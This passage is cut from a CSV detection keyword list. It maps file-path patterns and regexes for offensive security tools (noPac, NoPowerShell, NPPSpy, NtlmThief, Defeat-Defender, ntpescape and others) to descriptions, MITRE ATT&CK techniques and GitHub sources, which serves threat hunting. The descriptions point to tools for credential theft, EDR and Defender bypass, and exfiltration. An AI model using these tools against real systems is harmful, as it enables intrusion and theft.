It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*/nopac.exe",".{0,1000}\/nopac\.exe","offensive_tool_keyword","POC","POC exploitation for CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user","T1548 - T1134 - T1078 - T1078.002","TA0004 ","N/A","N/A","Exploitation tools","https://github.com/ricardojba/noPac","1","0","N/A","N/A","1","34","5","2021-12-19T17:42:12Z","2021-12-13T18:51:31Z" "*/nopac.py*",".{0,1000}\/nopac\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/No-PowerShell.cs*",".{0,1000}\/No\-PowerShell\.cs.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*/No-PowerShell.exe*",".{0,1000}\/No\-PowerShell\.exe.{0,1000}","offensive_tool_keyword","No-powershell","powershell script to C# (no-powershell)","T1059.001 - T1027 - T1500","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gtworek/PSBits/blob/master/Misc/No-PowerShell.cs","1","1","N/A","8","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" 
"*/nopowershell.git*",".{0,1000}\/nopowershell\.git.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*/nopowershell/*",".{0,1000}\/nopowershell\/.{0,1000}","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 
Spider","C2","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*/NoPowerShell/*",".{0,1000}\/NoPowerShell\/.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","1","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*/norouteconfig.sh*",".{0,1000}\/norouteconfig\.sh.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","1","N/A","9","7","N/A","N/A","N/A","N/A" "*/noseyparker.git*",".{0,1000}\/noseyparker\.git.{0,1000}","offensive_tool_keyword","noseyparker","Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/praetorian-inc/noseyparker","1","1","N/A","8","10","1514","72","2024-04-29T15:26:13Z","2022-11-08T23:09:17Z" "*/NotQuite0DayFriday/zip/trunk*",".{0,1000}\/NotQuite0DayFriday\/zip\/trunk.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/NovaLdr.exe",".{0,1000}\/NovaLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*/NovaLdr.git*",".{0,1000}\/NovaLdr\.git.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*/NoveLdr.exe",".{0,1000}\/NoveLdr\.exe","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. 
It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","1","N/A","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*/nowsecure/dirtycow*",".{0,1000}\/nowsecure\/dirtycow.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","1","N/A","N/A","1","92","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*/nping-brute.nse*",".{0,1000}\/nping\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/NPPSPY.dll*",".{0,1000}\/NPPSPY\.dll.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*/NPPSpy.exe*",".{0,1000}\/NPPSpy\.exe.{0,1000}","offensive_tool_keyword","NPPSpy","Simple code for NPLogonNotify(). 
The function obtains logon data including cleartext password","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gtworek/PSBits/blob/master/PasswordStealing/NPPSpy","1","1","N/A","10","10","2977","500","2024-04-26T20:31:04Z","2019-06-29T13:22:36Z" "*/nps_payload.git*",".{0,1000}\/nps_payload\.git.{0,1000}","offensive_tool_keyword","nps_payload","This script will generate payloads for basic intrusion detection avoidance","T1027 - T1027.005 - T1055 - T1211","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/trustedsec/nps_payload","1","1","N/A","9","5","431","130","2023-11-30T09:24:13Z","2017-07-23T17:01:19Z" "*/nrpe-enum.nse*",".{0,1000}\/nrpe\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/nsa-rules.git*",".{0,1000}\/nsa\-rules\.git.{0,1000}","offensive_tool_keyword","nsa-rules","Password cracking rules and masks for hashcat that I generated from cracked passwords.","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/NSAKEY/nsa-rules","1","1","N/A","10","6","513","124","2017-01-03T11:53:25Z","2016-02-15T20:49:32Z" "*/NSudo.bat*",".{0,1000}\/NSudo\.bat.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*/NSudo.exe*",".{0,1000}\/NSudo\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to 
dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","1","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*/NSudo.exe*",".{0,1000}\/NSudo\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*/NSudoG.exe*",".{0,1000}\/NSudoG\.exe.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*/ntapphelpcachecontrol*",".{0,1000}\/ntapphelpcachecontrol.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. 
identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/ntdissector.git*",".{0,1000}\/ntdissector\.git.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","1","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*/ntdissector/*",".{0,1000}\/ntdissector\/.{0,1000}","offensive_tool_keyword","ntdissector","Ntdissector is a tool for parsing records of an NTDS database. 
Records are dumped in JSON format and can be filtered by object class.","T1003.003","TA0006 ","N/A","N/A","Credential Access","https://github.com/synacktiv/ntdissector","1","0","N/A","9","2","100","10","2024-01-30T14:28:59Z","2023-09-05T12:13:47Z" "*/ntdll_unhooking.exe*",".{0,1000}\/ntdll_unhooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/ntdlll-unhooking-collection*",".{0,1000}\/ntdlll\-unhooking\-collection.{0,1000}","offensive_tool_keyword","ntdlll-unhooking-collection","unhooking ntdll from disk - from KnownDlls - from suspended process - from remote server (fileless)","T1055 - T1055.001 - T1070 - T1070.004 - T1101 - T1574 - T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/ntdlll-unhooking-collection","1","1","N/A","9","2","161","34","2023-08-02T02:26:33Z","2023-02-07T16:54:15Z" "*/NTDLLReflection.git*",".{0,1000}\/NTDLLReflection\.git.{0,1000}","offensive_tool_keyword","NTDLLReflection","Bypass Userland EDR hooks by Loading Reflective Ntdll in memory from a remote server based on Windows ReleaseID to avoid opening a handle to ntdll and trigger exported APIs from the export table","T1055.012 - 
T1574.002 - T1027.001 - T1218.011","TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/NTDLLReflection","1","1","N/A","9","3","286","41","2023-08-02T02:21:43Z","2023-02-03T17:12:33Z" "*/NtdllUnpatcher.git*",".{0,1000}\/NtdllUnpatcher\.git.{0,1000}","offensive_tool_keyword","NtdllUnpatcher","code for EDR bypassing","T1070.004 - T1055.001 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Signal-Labs/NtdllUnpatcher","1","1","N/A","10","2","146","32","2019-03-07T11:10:40Z","2019-03-07T10:20:19Z" "*/ntds_dump_*.txt*",".{0,1000}\/ntds_dump_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*/ntdsutil.py*",".{0,1000}\/ntdsutil\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/NTHASH-FPC.git*",".{0,1000}\/NTHASH\-FPC\.git.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","1","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" 
"*/ntlm.py*",".{0,1000}\/ntlm\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*/ntlmdecoder.py*",".{0,1000}\/ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","1","N/A","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*/ntlmdecoder.py*",".{0,1000}\/ntlmdecoder\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/NTLMInjector.git*",".{0,1000}\/NTLMInjector\.git.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","1","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*/NTLMParse.go*",".{0,1000}\/NTLMParse\.go.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*/ntlmquic*",".{0,1000}\/ntlmquic.{0,1000}","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" "*/NTLMRecon*",".{0,1000}\/NTLMRecon.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. 
Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","455","68","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*/NTLMRecon.git*",".{0,1000}\/NTLMRecon\.git.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*/ntlmrecon/*.py*",".{0,1000}\/ntlmrecon\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*/NTLMRelay2Self*",".{0,1000}\/NTLMRelay2Self.{0,1000}","offensive_tool_keyword","NTLMRelay2Self","An other No-Fix LPE - NTLMRelay2Self over HTTP (Webdav).","T1078 - T1078.004 - T1557 - T1557.001 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/med0x2e/NTLMRelay2Self","1","1","N/A","10","4","377","44","2024-01-27T08:52:03Z","2022-04-30T10:05:02Z" "*/NtlmRelayToEWS.git*",".{0,1000}\/NtlmRelayToEWS\.git.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" 
"*/NtlmRelayToEWS/*",".{0,1000}\/NtlmRelayToEWS\/.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*/ntlmrelayx/*",".{0,1000}\/ntlmrelayx\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/ntlmrelayx/*",".{0,1000}\/ntlmrelayx\/.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation 
tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*/ntlmscan.git*",".{0,1000}\/ntlmscan\.git.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","340","56","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*/ntlmscan/*",".{0,1000}\/ntlmscan\/.{0,1000}","offensive_tool_keyword","ntlmscan","scan for NTLM directories","T1087 - T1083","TA0006","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/ntlmscan","1","1","N/A","N/A","4","340","56","2023-05-24T05:11:27Z","2019-10-23T06:02:56Z" "*/NTLMSleuth.git*",".{0,1000}\/NTLMSleuth\.git.{0,1000}","offensive_tool_keyword","NTLMSleuth","verify NTLM hash integrity against the robust database of ntlm.pw.","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/jmarr73/NTLMSleuth","1","1","N/A","8","1","7","0","2023-12-12T17:23:35Z","2023-12-12T16:41:35Z" "*/NtlmThief.git*",".{0,1000}\/NtlmThief\.git.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","1","N/A","10","3","205","30","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z" "*/ntlmtransport.go*",".{0,1000}\/ntlmtransport\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*/ntlmutil.py*",".{0,1000}\/ntlmutil\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","Enumerate information from NTLM authentication enabled web endpoints","T1212 - T1212.001 - T1071 - T1071.001 - T1087 - T1087.001","TA0009 - TA0007 - 
TA0006","N/A","N/A","Discovery","https://github.com/puzzlepeaches/NTLMRecon","1","1","N/A","8","1","33","3","2023-08-16T14:34:10Z","2023-08-09T12:10:42Z" "*/ntlmutil.py*",".{0,1000}\/ntlmutil\.py.{0,1000}","offensive_tool_keyword","NTMLRecon","A fast and flexible NTLM reconnaissance tool without external dependencies. Useful to find out information about NTLM endpoints when working with a large set of potential IP addresses and domains","T1595","TA0009","N/A","N/A","Network Exploitation tools","https://github.com/pwnfoo/NTLMRecon","1","1","N/A","N/A","5","455","68","2023-08-31T05:39:48Z","2019-12-01T06:06:30Z" "*/ntlmv1.py*",".{0,1000}\/ntlmv1\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/ntlmv1.py*",".{0,1000}\/ntlmv1\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/ntpescape.git*",".{0,1000}\/ntpescape\.git.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","1","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "*/ntp-info.nse*",".{0,1000}\/ntp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap 
